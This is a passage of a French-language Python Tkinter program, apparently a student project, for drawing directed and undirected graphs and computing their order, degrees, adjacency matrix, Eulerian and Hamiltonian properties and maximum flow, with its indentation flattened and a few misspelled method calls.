self.Close_Toplevel) n=len(self.sommets) self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='L ordre du graphe est: {}'.format(n)) self.toplevel_dialog_label.pack(side='top') self.toplevel_dialog_yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.toplevel_dialog_yes_button.pack(side='right',fill='x',expand=True) for i in range(3): self.toplevel_dialog_label3=tk.Label(self.toplevel_dialog, text='\n') self.toplevel_dialog_label3.pack() pass def sommet(self, event): x,y=event.x,event.y if self.point==[]: self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan") self.numero=self.graphe.create_text(x,y,text="{}".format(self.i)) self.point.append([event.x,event.y,self.sommet,self.numero,self.i]) self.sommets.append(self.i) self.i+=1 else: controle=0 for element in self.point: if element[0]-25 < event.x < element[0]+25 and element[1]-25 < event.y < element[1]+25: controle=1 if controle==0: self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan") self.numero=self.graphe.create_text(x,y,text="{}".format(self.i)) self.point.append([event.x,event.y,self.sommet,self.numero,self.i]) self.sommets.append(self.i) self.i+=1 #procedure permettant de dessiner un arc entre deux sommets def arc(self, event): for element in self.point: if element[0]-10 < event.x < element[0]+10 and element[1]-10 < event.y < element[1]+10: self.temp.append(element) self.compt+=1 if self.compt==2: self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(502,100) self.toplevel_dialog.wm_title("Arc") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) 
self.toplevel_dialog.bind("<Return>", self.Close_arc) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer la distance entre le sommet {} et le sommet {}: '.format(self.temp[0][4],self.temp[1][4])) self.label.pack(side='top') self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.pack(side='top') self.valeur.bind("<Return>", self.Close_arc) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_arc) self.yes_button.pack(side='right',fill='x',expand=True) def Close_arc (self,event=None): if self.temp[0][0] < self.temp[1][0]: a=[self.temp[0][0]+10,self.temp[0][1]] b=[self.temp[1][0]-10,self.temp[1][1]] self.graphe.create_line(a,b,arrow="last") try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) elif self.temp[0][0]==self.temp[1][0]: self.graphe.delete(self.temp[0][2]) self.graphe.delete(self.temp[0][3]) self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-25,self.temp[0][0]+1,self.temp[0][1]) self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-10,self.temp[0][0]+10,self.temp[0][1]+10,fill="cyan") self.graphe.create_text(self.temp[0][0],self.temp[0][1],text="{}".format(self.temp[0][4])) a=(self.temp[0][0],self.temp[0][1]-10.5) b=(self.temp[0][0],self.temp[0][1]-10) self.graphe.create_line(a,b,arrow="last") try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) else: a=[self.temp[0][0]-10,self.temp[0][1]] b=[self.temp[1][0]+10,self.temp[1][1]] self.graphe.create_line(a,b,arrow="last") 
try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) self.compt=int() self.temp=list() self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() ########################################### # - Fenetre Graphe Orienter - # # /////////////////////////////////////////////// # # Description: Programme traitant sur les graphes # # Orienter # # /////////////////////////////////////////////// # class Graphe_Non_Oriente(Tk): def __init__(self): Tk.__init__(self) # constructeur de la classe parente #recupere la taille de l'ecrant de l'ordinateur width=self.winfo_screenwidth() height=self.winfo_screenheight() self.largeure=900 self.hauteure=500 self.x=(width/2)-(self.largeure/2) self.y=(height/2)-(self.hauteure/2) #initialisation du canvas self.graphe =Canvas(self, width =self.largeure, height =self.hauteure, bg ="white") self.geometry('{}x{}+{}+{}'.format(self.largeure,self.hauteure,int(self.x),int(self.y))) self.resizable(False,False) self.wm_title('Graphe Non Oriente') self.graphe.pack(side =TOP, padx =5, pady =5) #evenement declancher par les clic de la sourie self.bind("<Double-Button-1>", self.sommet) self.bind("<Button-3>", self.arc) #menu de la fenetre menubar = Menu(self) filemenu = Menu(menubar, tearoff = 0) filemenu.add_separator() filemenu.add_command(label = "Quitter ?", command = self.destroy) filemenu.add_command(label = "Sauvegarder", command = self.save) menubar.add_cascade(label = "Fichier", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_separator() filemenu.add_command(label = "Ordre du graphe", command=self.ordre_graphe) filemenu.add_command(label = "Degre du sommet", command=self.degres_sommet) filemenu.add_command(label = "Matrice d'adjacence", command=self.matriceAdj) filemenu.add_command(label = "Successeur du sommet", command=self.successeur) 
filemenu.add_command(label = "Predecesseur du sommet", command=self.predeccesseur) filemenu.add_command(label = "Graphe Hamiltonien ?", command=self.hamilton) filemenu.add_command(label = "Graphe Eulerien ?", command=self.euler) filemenu.add_command(label = "Flow maximal", command=self.maxflow) menubar.add_cascade(label = "Traitement", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label = "Tout effacer ?", command =self.delete) menubar.add_cascade(label = "Effacer", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label = "Aide", command =self.aide) menubar.add_cascade(label = "Aide", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) self.config(menu = menubar) #variable globale self.i=int(0) self.compt=int() self.temp=list() self.connect=list() self.point=list() self.sommets=list() self.couple=list() self.matrice=list() self.var=StringVar() self.entier=int() def delete(self): for element in self.graphe.find_all(): self.graphe.delete(element) self.i=int(0) self.compt=int() self.temp=list() self.connect=list() self.point=list() self.sommets=list() self.couple=list() self.matrice=list() self.var=StringVar() self.entier=int() pass # fonction permettant de fermer la fenetre fille def Close_Toplevel (self): self.compt=int() self.temp=list() self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() def aide(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,150) self.toplevel_dialog.wm_title("Aide") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=150 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) 
self.toplevel_dialog.focus() aide=""" Tracer un sommet: Double clic Tracer un arc: clic gauche sur chaque sommet """ self.label=tk.Label(self.toplevel_dialog, text=aide,justify='left',font='Century 13 bold') self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fenetre permettant de fermet la fenetre fille de sauvegarde def Close_Save (self,event=None): if len(self.var.get())>0: x=self.graphe.winfo_rootx() y=self.graphe.winfo_rooty() w=self.graphe.winfo_width() h=self.graphe.winfo_height() image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2)) image.save("save/{}.png".format(self.var.get())) else: x=self.graphe.winfo_rootx() y=self.graphe.winfo_rooty() w=self.graphe.winfo_width() h=self.graphe.winfo_height() image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2)) image.save("save/Graphe.png") self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() #fonction de sauvegarde du graphe dessiner def save(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Sauvegarder") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Save) self.label=tk.Label(self.toplevel_dialog, text='Entrer le nom de limage: ') self.label.pack(side='left') self.var=tk.Entry(self.toplevel_dialog) self.var.pack(side='left') self.var.bind("<Return>", self.Close_Save) self.var.bind("<Escape>", self.Close_Toplevel) self.var.focus_set() 
self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_Save) self.yes_button.pack(side='right',fill='x',expand=True) # fonction permettant de detecter si le graphe est eulerien def euler(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Graphe eulerien") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.focus() l=len(self.couple) lg=len(self.sommets) if lg>=2: g1 = Euler(lg) for i in range(l): g1.addEdge(self.couple[i][0],self.couple[i][1]) self.var=g1.test() self.label=tk.Label(self.toplevel_dialog, text=self.var) self.label.pack(side='top') else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de detecter si le graphe est hamiltonien def hamilton(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Graphe hamiltonien") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) 
self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.focu() lg=len(self.couple) if lg>1: l=len(self.sommets) self.matrice=list() for i in range(l): self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(1) k+=1 if k==0: self.matrice[i].append(0) g1 = Hamilton(l) g1.graph = self.matrice self.var=g1.hamCycle() self.label=tk.Label(self.toplevel_dialog, text=self.var) self.label.pack(side='top') pass else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de connetre le flow maximal def maxflow(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,200) self.toplevel_dialog.wm_title("Flow maximal") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=200 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet source: ') self.label.grid(row=1) self.valeur1=tk.Entry(self.toplevel_dialog) self.valeur1.grid(row=1,column=1) self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet destination: ') self.label.grid(row=2) 
self.valeur2=tk.Entry(self.toplevel_dialog) self.valeur2.grid(row=2,column=1) self.label=tk.Label(self.toplevel_dialog, text='\n\n') self.label.grid(row=3) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_maxflow) self.yes_button.grid(row=4,column=1) self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=4,column=3) pass def Close_maxflow (self): lg=len(self.couple) if self.valeur1.get() in str(self.sommets) and self.valeur2.get() in str(self.sommets) and lg>0 and self.valeur1.get()!=self.valeur2.get() : l=len(self.sommets) self.matrice=list() for i in range(l): self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(element[2]) k+=1 if k==0: self.matrice[i].append(0) g = Max_flow(self.matrice) src=int(self.valeur1.get()) des=int(self.valeur2.get()) self.label=tk.Label(self.toplevel_dialog, text="Le flow maximal est %d " % g.FordFulkerson(src, des)) self.label.grid(row=6) else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.grid(row=6) pass def matriceAdj(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(300,300) self.toplevel_dialog.wm_title("Matrice D'adjacence") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=300 hauteure=300 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.focus() lg=len(self.couple) if lg>0: l=len(self.sommets) self.matrice=list() for i 
in range(l): resultat="" resultat+=str(self.sommets[i])+"| " self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(1) resultat+="1 " k+=1 if k==0: self.matrice[i].append(0) resultat+="0 " self.label=tk.Label(self.toplevel_dialog, text=resultat) self.label.pack(side='top') pass else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de donner le successeur d'un sommet def successeur(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(650,100) self.toplevel_dialog.wm_title("Successeur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=650 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_suc) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_suc) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_suc) self.yes_button.grid(row=1,column=4) pass def Close_suc(self): 
if self.valeur.get() in str(self.sommets): resultat="" for element in self.couple: if self.valeur.get() == str(element[0]): resultat+=str(element[1])+" " self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) successeur du sommet {} est: {}'.format(self.valeur.get(),resultat)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def predeccesseur(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(650,100) self.toplevel_dialog.wm_title("Predecesseur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=650 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_pred) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_pred) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_pred) self.yes_button.grid(row=1,column=4) def Close_pred(self): if self.valeur.get() in str(self.sommets): resultat="" for element in self.couple: if self.valeur.get() == str(element[1]): resultat+=str(element[0])+" " self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) predecesseur du sommet {} est: {}'.format(self.valeur.get(),resultat)) 
self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def degres_sommet(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Degre du sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_degre) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_degre) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=5) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre) self.yes_button.grid(row=1,column=3) def Close_degre(self): if self.valeur.get() in str(self.sommets): k=int(0) for element in self.couple: if self.valeur.get() == str(element[1]): k+=1 self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le degre du sommet {} est: {}'.format(self.valeur.get(),k)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def ordre_graphe(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(502,50) self.toplevel_dialog.wm_title("Ordre du 
graphe") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=50 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.fovus() n=len(self.sommets) self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='L ordre du graphe est: {}'.format(n)) self.toplevel_dialog_label.pack(side='top') self.toplevel_dialog_yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=82,command=self.Close_Toplevel) self.toplevel_dialog_yes_button.pack(side='right',fill='x',expand=True) for i in range(3): self.toplevel_dialog_label3=tk.Label(self.toplevel_dialog, text='\n') self.toplevel_dialog_label3.pack() pass def sommet(self, event): x,y=event.x,event.y if self.point==[]: self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan") self.numero=self.graphe.create_text(x,y,text="{}".format(self.i)) self.point.append([event.x,event.y,self.sommet,self.numero,self.i]) self.sommets.append(self.i) self.i+=1 else: controle=0 for element in self.point: if element[0]-25 < event.x < element[0]+25 and element[1]-25 < event.y < element[1]+25: controle=1 if controle==0: self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan") self.numero=self.graphe.create_text(x,y,text="{}".format(self.i)) self.point.append([event.x,event.y,self.sommet,self.numero,self.i]) self.sommets.append(self.i) self.i+=1 #procedure permettant de dessiner un arc entre deux sommets def arc(self, event): for element in self.point: if element[0]-10 < event.x < element[0]+10 and element[1]-10 < event.y < element[1]+10: self.temp.append(element) self.compt+=1 if self.compt==2: self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) 
self.toplevel_dialog.minsize(502,100) self.toplevel_dialog.wm_title("Arc") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_arc) self.toplevel_dialog.focus self.label=tk.Label(self.toplevel_dialog, text='Entrer la distance entre le sommet {} et le sommet {}: '.format(self.temp[0][4],self.temp[1][4])) self.label.pack(side='top') self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.pack(side='top') self.valeur.bind("<Return>", self.Close_arc) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_arc) self.yes_button.pack(side='right',fill='x',expand=True) def Close_arc (self,event=None): if self.temp[0][0] < self.temp[1][0]: a=[self.temp[0][0]+10,self.temp[0][1]] b=[self.temp[1][0]-10,self.temp[1][1]] self.graphe.create_line(a,b) try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier!=0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) self.couple.append([self.temp[1][4],self.temp[0][4],self.entier]) elif self.temp[0][0]==self.temp[1][0]: self.graphe.delete(self.temp[0][2]) self.graphe.delete(self.temp[0][3]) self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-25,self.temp[0][0]+1,self.temp[0][1]) self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-10,self.temp[0][0]+10,self.temp[0][1]+10,fill="cyan") 
self.graphe.create_text(self.temp[0][0],self.temp[0][1],text="{}".format(self.temp[0][4])) a=(self.temp[0][0],self.temp[0][1]-10.5) b=(self.temp[0][0],self.temp[0][1]-10) self.graphe.create_line(a,b) try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) self.couple.append([self.temp[1][4],self.temp[0][4],self.entier]) else: a=[self.temp[0][0]-10,self.temp[0][1]] b=[self.temp[1][0]+10,self.temp[1][1]] self.graphe.create_line(a,b) try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) self.couple.append([self.temp[1][4],self.temp[0][4],self.entier]) self.compt=int() self.temp=list() self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() ###################################################### # - Programme Principale - # # /////////////////////////////////////////////// # # Description: Fenetre Principale du Programme # # /////////////////////////////////////////////// # if __name__ == '__main__': #initialisation du canvas fen =Tk() width=fen.winfo_screenwidth() height=fen.winfo_screenheight() largeure=900 hauteure=500 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) graphe =Canvas(fen, width =largeure, height =hauteure ,bg="light yellow") fen.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) fen.wm_title("Graphe Trace") graphe.pack(side =TOP, padx =5, pady =5) fen.resizable(False,False) icon=PhotoImage(file='img/img.png') fen.tk.call('wm','iconphoto',fen._w,icon) photo = PhotoImage(file="img/img.png",width=largeure,height=hauteure) graphe.create_image(300, 90, anchor=NW, image=photo) def menu(): menubar = Menu(fen) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label="Graphe Oriente", command = graphe_oriente) 
filemenu.add_command(label="Graphe Non Oriente", command = graphe_non_oriente) filemenu.add_separator() filemenu.add_command(label = "Quitter", command = fen.destroy) menubar.add_cascade(label = "Graphe", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label = "Auteur", command = Auteur) filemenu.add_command(label="Description", command = Description) filemenu.add_command(label="Version", command = Version) menubar.add_cascade(label = "A Propos", menu = filemenu) fen.config(menu = menubar) fen.mainloop() pass def donothing(): #filewin = Toplevel(root) #button = Button(filewin, text="Do nothing button") #button.pack() pass def graphe_oriente(): # mise en place du canevas app = GrapheOriente() app.mainloop() fen.mainloop() def graphe_non_oriente(): # mise en place du canevas app = Graphe_Non_Oriente() app.mainloop() fen.mainloop() def Auteur(): a_propos=""" Ce logiciel a ete creer par des etudiants en deuxiemme annnee Miage. Notamment par: Sawadogo R.R Sylvain Sawadogo Sidbewende Omar Yameogo Pingdwinde Boris """ fen.wm_attributes("-disable",True) fen.toplevel_dialog=tk.Toplevel(fen) fen.toplevel_dialog.minsize(502,210) fen.toplevel_dialog.wm_title("Auteur") width=fen.toplevel_dialog.winfo_screenwidth() height=fen.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=210 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) fen.toplevel_dialog.transient(fen) fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel) fen.label=tk.Label(fen.toplevel_dialog, text=a_propos,justify='left',font='Century 13 bold') fen.label.grid(row=1,padx =5, pady =5) fen.yes_button=ttk.Button(fen.toplevel_dialog,text='Ok',width=82,command=Close_Toplevel) fen.yes_button.grid(row=2) def Description(): a_propos=""" Ce logiciel a ete creer dans le cadre de traitement de graphe. 
""" fen.wm_attributes("-disable",True) fen.toplevel_dialog=tk.Toplevel(fen) fen.toplevel_dialog.minsize(502,126) fen.toplevel_dialog.wm_title("Description") width=fen.toplevel_dialog.winfo_screenwidth() height=fen.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=126 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) fen.toplevel_dialog.transient(fen) fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel) fen.label=tk.Label(fen.toplevel_dialog, text=a_propos,justify='left',font='Century 13 bold') fen.label.grid(row=1,padx =5, pady =5) fen.yes_button=ttk.Button(fen.toplevel_dialog,text='Ok',width=82,command=Close_Toplevel) fen.yes_button.grid(row=2) def Version(): a_propos="""Version 1.0.0""" fen.wm_attributes("-disable",True) fen.toplevel_dialog=tk.Toplevel(fen) fen.toplevel_dialog.minsize(300,64) fen.toplevel_dialog.wm_title("Version") width=fen.toplevel_dialog.winfo_screenwidth() height=fen.toplevel_dialog.winfo_screenheight() largeure=300 hauteure=64 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) fen.toplevel_dialog.transient(fen) fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel) fen.label=tk.Label(fen.toplevel_dialog, text=a_propos,justify='left',font='Century 13 bold') fen.label.grid(row=1,padx =5, pady =5) 